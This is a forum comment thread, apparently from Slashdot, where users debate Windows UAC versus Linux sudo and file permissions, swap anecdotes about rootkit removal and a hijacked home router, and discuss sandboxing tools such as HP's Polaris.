The flaw in these systems models is that developer tools and debuggers specifically are not built in to the system but rather are treated the same as any other application, which means any app can take control of any other app with only an "are you sure" screen in between at best.
So, when was gdb integrated into Linux kernel?
And what about Win32 debugging API?
Finally, an app cannot take control - as debugger or otherwise - of another app, unless it is as much or more privileged in security terms. It can request the OS to elevate, of course, prompting an UAC prompt. I'm not sure if that's what you mean by "are you sure screen", but if so, then how is Linux different? A Linux app can just as easily run gksudo (or whatever) to grant a process it controls root, and then use that process to do anything and everything up to and including loading kernel modules, which means full access to all processes.
It's not about profit, it's that windows gives people administrator by default (and you can still enable it in Windows 7).
Windows didn't do this since XP. And you can still enable root in Linux, too.
iexplore.exe is asking for administrator access. grant forever/don't ask again? Way to go, giving viruses admin access. It happens all the time.
There's no option to "don't ask again" in UAC prompts. You can set an app shortcut to "always run as administrator" in its properties, but that would just pop an UAC prompt automatically every time you start it. You can't skip that prompt, short of turning UAC off altogether (which amounts to running as root on Linux).
Aside from that, iexplore.exe won't ever ask to elevate by itself. If your does, then you have a trojan already.
However, on this front, UAC doesn't do squat (especially when you can get around UAC).
Please explain how UAC is any less secure than sudo (and various graphical wrappers around that, as seen in Ubuntu etc).
as a user you NEVER HAVE TO GIVE THEM ROOT ACCESS. Ever! I can as a user install software, make changes, Hell I can change Xorg settings and never touch /etc if I blow the hell out of things I only blow the hell out of it for me.
Can you tell what distro you use that lets unprivileged users install software via the package manager?
Oh, and you do realize that users can install Windows software for themselves, if said software supports such mode of operation, right? Ever seen Chrome on Windows, or any ClickOnce app?
windows? I have to write to that abortion called the registry that is in the system folder.,
You don't need elevated permissions to access HKEY_CURRENT_USER registry hive, which is where all per-user settings are.
In some ways I feel bad for Microsoft because a lot of business critical apps were designed in the windows 3.1/95 era where you could write to files anywhere on the drive and the OS wouldn't stop you. The problem now is that these software developers have yet to join the last decade and stop writing their files wherever they feel like it so now Microsoft is stuck because if they break the apps no one will upgrade leaving things insecure or if they leave things the same way they are now things will be insecure. UAC is the middle road where users get shown exactly what software is a problem but are still able to get work done.
Linux/*BSD/OSX all have the advantage here because on those OS apps that behave so badly won't even run in the first place and that's why non windows people get so annoyed when people go on about how cool UAC is.
...But you run around with a weak password on your home ROUTER?
Typical, arrogant Slashdot. You deserve what you got.
And sometimes it doesn't take a rogue download!
My story:
I had a router that was probably 3-4 years old. It worked just fine, and did everything I needed it to. Except, of course, keep out hackers.
One day, I started being unable to get to certain websites. That list grew.
I kept checking all the PCs in the house for viruses or trojans or spyware, and all kept coming up clean.
I checked the routing, and I was being funneled through some random odd IP addresses.
Removed the errant links in the route, and things changed back to normal. Not a week or so later, and the same problem!
Went out and grabbed myself a new router, and the issues haven't come back since!
(I changed the default username and password, router's ip address, set up wireless password, disabled remote login—I thought I had done everything I could to secure the router from that type of thing... I guess I didn't protect it from design flaws it may have had, that I had no control over)
I imagine that the longer a router is out, the more time the hackers have to find the chinks in the armor of the router's security, and the easier it is to take control of them.
Especially since I rarely ever see many firmware updates for routers. I think I saw a few for the old one, but there was a span of a year or more where there was nothing.
You know, if a company knows that its routers can be or have been compromised, it'd be a good idea to let the public know (so they could then work to better protect themselves).
I wouldn't have even known if some websites hadn't stopped working! And I now more often check my routing, to make sure I'm not being redirected.
Let's ignore the API/ABI issue. Suppose a miracle happens, and every app developer decides to exclusively support native KeyKOS and EROS features.
How would it even work?
Without filenames, there is no reasonable way for the human to express things. I'm not going to type a UUID.
Without programs being able to scan directories, they can't offer nice File/Open dialog boxes. Consider the gimp, which provides a preview thumbnail.
Consider the common Edit/Insert operation. The app goes looking for a file to insert into a document.
Consider something like Open Office or Firefox. These apps have only one instance normally, even if you click the icon multiple times. This is for consistancy (multiple instances editing a single file is bad) and for memory use reduction.
What would your GUI look like? How non-desktop must it be?
Linux/unix had the concept of su years before Microsoft thought of it; and it is a built in process to the operating system, not an afterthought.
Do you have a citation wrt your claims about rogue processes faking gksudo? "see:Ubuntu" is not enough. Windows systems can be attacked and compromised by code that injects into the windows kernel itself thru web browsers; I haven't seen any creditable evidence yet that system processes in linux can be compromised the same way. Userland, certainly, although exploits such as that are still very rare; but that doesn't compromise the system.
I do tech support for both windows and linux desktop systems, so I would be very interested in any information you can come up with.
SB
It's old. The more humans I meet, the more I like my cats. At least they are honest.
System access gives you the ability to hide your running processes from userland scans and deletion of your running files and boot hooks.
There are very few - if any (correct me if I'm wrong, please, with details, if those details are informative enough I'll even pay for the knowledge!) antivirus or antimalware programs that can detect and reliably remove rootkits. I certainly haven't found any that can do so, that's why I rely on combofix, the tdss variant removers, gmer, my intuition, and other tools to remove persistent infections from the increasing number of rootkit infected systems I deal with all the time as an independent home computer technician.
Userland malware isn't the real problem, anymore - most antivirus and antimalware programs can deal with that ( and I agree that most end users don't know to run it, even if they would know what to run, sadly, this is another of the bad things about Microsoft, education of end users as to the problems they will face, but Windows Defender, etc, hell, that's a whole nother topic) the real problem nowadays that I'm seeing much more of is rootkits that keep the spambot/malware alive, regenerates it when you kill it thru other methods.
I have a pretty good toolkit, and enough knowledge, at this point to wipe this crap out on every system I encounter; but I know that it's going to get a lot worse. I already spend about thirty hours a week just trying to keep up on the latest removal tools after seeing a system last week with more than four rootkits on it, in addition to much other crap. (Cleaned it, to the best of my knowledge)
What got me, this year, is that for the first time since Klez I had one of my home systems infected. It was a TDSS variant (probably thru a driveby ad, near as I can tell), got it removed, but even tho I've been doing tech support since before Windows existed; couldn't trace the source of the infection back as well as I want to. Since then I've seen a lot of other attacks being tried, some of which failed on my system because they were executing invalid instructions (experimentation, I imagine); I know it's getting bad out there. I'm careful past the point of paranoia with my home systems.
I have customers who rely on me to keep their systems clean. I have to tell them that I can't be one hundred percent certain that I can guarantee they will be free of crap. Some of them I migrate to linux, Ubuntu or Fedora, if it works for them. I know there aren't any solid solutions, but when I see an article like this, I just have to say that I think the real problem is Microsoft's operating system.
I should probably make this a slashdot Question. Busy... ;) and speaking of busy, I have three systems on the bench tonite I am paying lip service too...
SB
It's old. The more humans I meet, the more I like my cats. At least they are honest.
The main reason Windows gets nailed is that it's more profitable to write malware for Windows than for anything else. If Linux had the market share of Windows, it would have as much, or nearly as much, malware. This is one of the most common fallacies people spout during the Linux vs Windows debate. It's all about file permissions. Windows allows any program to be accessed by default, Linux does not. Sure an idiot user can screw up but most users have no idea how to assign root privilege to a file. Their ignorance is a sysadmin's bliss. The Network is a whole different story but on the desktop, the Linux file system and its permissions make it secure. In the end, it's user education that makes a machine secure, Linux just expands that education. Hence, a world of Windows users who click blindly and hope for the best.
Windows assumes you are an idiot...Linux demands proof.
The battle may be lost, but we don't have to lose the war! Let's step up our efforts. We can create a war on spam! It could be a misdemeanor to support the terrorist funding spam groups by allowing them your e-mail or the use of your machine! This could be supported by the government wiretapping efforts. It would help the economy by providing more free slave labor, and it would help stop the moral decline of the internet! Just say no to spam!
No, that's what MSNBC (Microsoft's news network at the time) tried to tell people, but it's not true, no matter how often you and other gullible people repeat it. The main reason that windows security sucks is that it wasn't always present, and so Microsoft started a user culture that encouraged insecurity by default. Essentially, they compromised security and other best practice for a quick gain in customers. Ever since, it's been biting them in the ass, which seems quite just to me.
That's not true for Linux OR Windows, and you know it. At least, I hope you do.
The simplest way is to compile and install software using a prefix of your choice. Or, any recent kernel will let you run a complete distro in a container. You also have these:
http://hacktolive.org/wiki/Methods_for_Portable_Applications_on_Linux
For You, Blue.
Polaris:
http://www.hpl.hp.com/research/mmsl/projects/adv/polaris.html?jumpid=reg_R1002_USEN
Virus Safe Computing:
http://www.hpl.hp.com/news/2005/apr-jun/virussafe.html?jumpid=reg_R1002_USEN
Download:
Disclaimers:
Polaris uses a kernel driver to work around a bug that Microsoft claims is not security related. We believe this kernel driver is the reason Polaris does not work with Windows Vista. If you run without it, you are vulnerable to an attacker who mounts a Shatter attack after launching a process via the COM server. However, you're probably safe until Polaris becomes widely used.
This version is a first prototype, which means there are a number of things we didn't do and a number of bugs we didn't fix. For example, this version does not support linked files. However, almost 100 people have used Polaris, some of them for several years, and have reported few problems. A few have them have reported that Polaris saved them from some nasty virues.
Polaris is NOT supported by HP. Send all questions to:
alan.karp at hp.com.
http://www.hpl.hp.com/personal/Alan_Karp/polaris/index.html?jumpid=reg_R1002_USEN
~hylas
garyk@lappy:~/scripts$ test2.sh /home/garyk/scripts/test2.sh: Permission denied
bash:
Which part of "sh test.sh" is so hard to understand? And yes, that works just fine on my Debian Testing box without the execute bit being set, just as expected...
np: Rndm - No Beginning (Dial 2010)
"I'm not anti-anything, I'm anti-everything, it fits better." - Sole
Can you see either solution being used by a casual user?
Linux/unix had the concept of su years before Microsoft thought of it; and it is a built in process to the operating system, not an afterthought.
I don't see how it was an afterthought. "runas" was introduced in Win2k, but the ability to impersonate other users existed in previous versions of NT kernel.
Do you have a citation wrt your claims about rogue processes faking gksudo?
Why would I need to cite anything? gksudo is not complicated. It's a graphical sudo wrapper which uses standard gtk dialogs. Why you would think a process couldn't fake it is beyond me.
Windows systems can be attacked and compromised by code that injects into the windows kernel itself thru web browsers;
...if the browser process is running under the necessary privilege level. Otherwise, that cannot without a privilege escalation exploit.
I haven't seen any creditable evidence yet that system processes in linux can be compromised the same way. Userland, certainly, although exploits such as that are still very rare; but that doesn't compromise the system.
Where are you getting the idea that vulnerabilities in Linux userland programs are more rare than they are in Windows? There are tons of security updates every month for various *nix ibraries and programs used in *unix OSs like Linux and BSD.
In regards to exploiting the system, the default implementations of sudo in distros like Ubuntu and debian (and I assume others), the root password is cached for a period of time after the user inputs it. A rogue process running with the users' credentials could sit in the background and wait for the user to invoke sudo, after which it could launch sudo itself and gain root.
Given desktop linux's obscurity, this is not really that big a threat, but it would surely be exploited if Linux had a sizable market share.
The solution to this problem is to turn off sudo password caching, or do what I prefer and enable the root account and use su instead of sudo.
I don't always use unix-like operating systems; but when I do, I prefer FreeBSD.
What about the HDfury? Sure, it's analog, but...
The other thing is, at least LCD panels use LVDS to connect to the controller board. Hijack the unencrypted LVDS signal.
Burn a Linux Live CD?
However, this still won't help against the user that browses... adult material first, gets himself (temporarily) infected and then moves on to do his banking.
Or the various drive-by and MitM attacks (owned router, e.g., which is incidentally what TFA was talking about).
Personally, I use a LiveCD for banking, which gets hooked up to the net directly through the DSL modem (PPPoE) without javascript or anything else enabled.
The kicker is that with this setup I am still in violation of the ToS of my bank, because there is no antivirus installed...
"always remember my decision for this application"? never heard of that? Way to go troll.
Well, when the parent is specifically discussing UAC, I think the better analogy would be
"Linux has better seatbelts!"
"Are they any more effective when a person who doesn't wear them is in the car?"
Casual user is a very different thing from unprivileged user. One is a skill level, the other is a (system) authorization level.
When I wrote "casual user", I meant just that. Supposedly, a casual user can install Ubuntu on his desktop these days without much trouble, and supposedly that will be "more secure". The claim in this thread is that (at least one of) the reason that is so is because the user doesn't have to elevate to install applications. Hence the question - do you see the proposed way of doing so (by ignoring the package manager, and manually compiling software with ./configure --prefix etc) being usable by casual users? And if not, then why is it touted as a security benefit, when it's not such for 95% of potential users, who are baited with it to switch?